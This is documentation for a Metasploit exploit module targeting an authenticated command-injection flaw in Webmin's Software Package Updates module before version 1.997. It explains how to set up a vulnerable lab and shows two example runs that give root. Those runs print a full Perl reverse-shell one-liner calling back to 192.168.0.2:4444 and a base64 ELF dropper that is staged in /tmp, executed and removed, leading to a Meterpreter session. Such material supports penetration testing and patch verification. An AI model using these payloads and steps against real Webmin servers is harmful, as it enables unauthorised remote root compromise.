## Vulnerable Application This module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module. ## Installation ### Ubuntu - Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb - Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04) ``` apt-get install libauthen-pam-perl libio-pty-perl dpkg -i ./webmin_1.996_all.deb ``` ## Setup - Go to `https://:10000/` - Login as `root` with the OS password - Create a new user: `Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create` - Setup permissions `Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save` ## Verification Steps 1. Install and setup the application 1. Start msfconsole 1. Do: `use exploit/linux/http/webmin_package_updates_rce` 1. Do: `run lhost= rhosts= username= password=` 1. You should get a shell. ## Options ### TARGETURI Set this to the Webmin base path. The default is `/`. ### USERNAME The account username to use. ### PASSWORD The account password. ## Scenarios ### Webmin 1.996 on Ubuntu 18.04 - Target 0 (`Unix In-Memory`) ``` msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456 [+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Webmin 1.996 detected [+] Webmin 1.996 is a supported target [+] The target appears to be vulnerable. [*] Attempting login [+] Logged in! [*] Sending payload [*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200 id uid=0(root) gid=0(root) groups=0(root) cat /etc/issue Ubuntu 18.04.6 LTS \n \l ``` - Target 1 (`Linux Dropper`) ``` msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456 [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Webmin 1.996 detected [+] Webmin 1.996 is a supported target [+] The target appears to be vulnerable. [*] Attempting login [+] Logged in! [*] Sending payload [*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"] [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3020772 bytes) to 192.168.0.23 [*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200 [*] Command Stager progress - 100.00% done (823/823 bytes) meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 192.168.0.23 OS : Ubuntu 18.04 (Linux 5.4.0-122-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux ```